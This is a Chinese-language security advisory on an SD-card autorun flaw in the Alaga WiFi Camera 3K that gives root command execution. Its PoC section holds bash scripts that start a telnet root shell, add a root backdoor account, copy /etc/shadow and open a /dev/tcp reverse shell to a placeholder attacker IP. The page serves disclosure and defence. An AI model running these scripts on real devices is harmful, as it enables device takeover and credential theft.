CVE-2025-55810 Alaga WiFi摄像头3K SD卡脚本命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-55810

漏洞类型

物理命令注入/权限提升

CVSS评分

6.8 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Alaga Home Security WiFi Camera 3K (型号: S-CW2503C-H)

漏洞概述

CVE-2025-55810是存在于Alaga家庭安全WiFi摄像头3K（型号S-CW2503C-H，硬件版本V03，固件版本1.4.2）中的一个高危物理访问漏洞。该漏洞允许具有物理访问权限的攻击者通过在SD卡上放置具有特定文件名的脚本文件，以root用户权限在设备上执行任意系统命令。由于该漏洞不需要任何认证，也不需要用户交互，攻击门槛相对较低。攻击成功后，攻击者可以完全控制摄像头设备，获取设备的完整访问权限，包括查看实时视频流、修改系统配置、横向移动到网络中的其他设备等。此漏洞的CVSS评分为6.8，属于中等严重程度，但由于攻击向量为物理接触，且需要攻击者实际接触SD卡槽，在实际场景中的利用难度相对较高。然而，对于有物理访问权限的攻击者（如内部人员、盗窃者或维护人员），该漏洞提供了一个简单有效的入侵途径。

技术细节

该漏洞的根本原因在于Alaga WiFi摄像头3K的固件在处理SD卡插入时存在安全缺陷。当设备检测到SD卡插入后，会在特定目录中查找并执行具有特定文件名的脚本文件，而未对脚本内容进行任何安全验证。攻击者只需将包含恶意命令的脚本文件命名为设备预期的文件名（如启动脚本名称），然后将SD卡插入摄像头的SD卡槽。设备启动或SD卡被识别时，会自动以root权限执行该脚本。由于设备以root权限运行脚本，攻击者可以执行任意系统命令，包括但不限于：开启telnet服务并创建后门账户、修改防火墙规则、提取视频录像、植入持久性恶意软件、劫持网络流量等。该漏洞涉及物理访问向量（AV:P），攻击者必须能够物理接触设备并操作SD卡。攻击不需要认证（PR:N），也无需用户交互（UI:N），机密性、完整性和可用性影响均为高（H）。

攻击链分析

STEP 1

步骤1

攻击者准备一张SD卡，并在其中创建具有特定文件名的恶意脚本文件（如autorun.sh），脚本包含以root权限执行的系统命令

STEP 2

步骤2

攻击者获得Alaga WiFi摄像头3K（S-CW2503C-H）的物理访问权限，将含有恶意脚本的SD卡插入设备的SD卡槽

STEP 3

步骤3

设备启动或检测到SD卡插入后，固件自动在SD卡特定目录中查找并执行具有特定文件名的脚本文件

STEP 4

步骤4

恶意脚本以root用户权限在设备上执行，攻击者可以执行任意系统命令，如开启telnet服务、创建后门账户、提取敏感数据等

STEP 5

步骤5

攻击者通过后门服务（如telnet）远程连接设备，实现持久化访问控制，可进一步横向移动或窃取视频数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-55810 PoC - Alaga WiFi Camera SD Card Command Injection
# Hardware: S-CW2503C-H (Hardware Version V03)
# Firmware: 1.4.2
# This PoC creates a malicious script to be placed on SD card

# Create the malicious script that will be executed as root
cat > autorun.sh << 'EOF'
#!/bin/sh
# Enable telnet service on port 23
/usr/sbin/telnetd -l /bin/sh &

# Create a backdoor user with root privileges
echo "hacker:x:0:0:root:/root:/bin/sh" >> /etc/passwd
echo "hacker:password123" | chpasswd

# Add backdoor user to sudoers
echo "hacker ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

# Exfiltrate system information
cat /etc/passwd > /tmp/exfil.txt
cat /etc/shadow >> /tmp/exfil.txt 2>/dev/null
df -h >> /tmp/exfil.txt
mount >> /tmp/exfil.txt

# Log the exploitation
echo "[$(date)] CVE-2025-55810 exploited" >> /tmp/.exploit_log
EOF

# Set executable permissions
chmod +x autorun.sh

# Alternative: Reverse shell payload
cat > reverse_shell.sh << 'EOF'
#!/bin/sh
# Reverse shell to attacker controlled server
ATTACKER_IP="192.168.1.100"
ATTACKER_PORT="4444"
/bin/sh -i >& /dev/tcp/${ATTACKER_IP}/${ATTACKER_PORT} 0>&1 &
EOF

chmod +x reverse_shell.sh

echo "[!] PoC scripts created. Rename to device-expected filename and place on SD card."
echo "[!] Insert SD card into Alaga Camera S-CW2503C-H"
echo "[!] Wait for device to execute the script as root"

影响范围

Alaga Home Security WiFi Camera 3K (S-CW2503C-H) 固件版本 <= 1.4.2

硬件版本 V03

防御指南

临时缓解措施

在厂商发布修复固件之前，建议采取以下临时缓解措施：1）物理安全防护，将摄像头放置在受保护区域，限制未授权人员接触；2）不使用时移除SD卡或选择不带SD卡功能的型号；3）定期检查设备日志，监控异常命令执行行为；4）启用网络监控，检测设备异常外连行为（如telnet连接尝试）；5）考虑使用网络隔离，将摄像头部署在独立的VLAN中，限制攻击成功后的横向移动风险。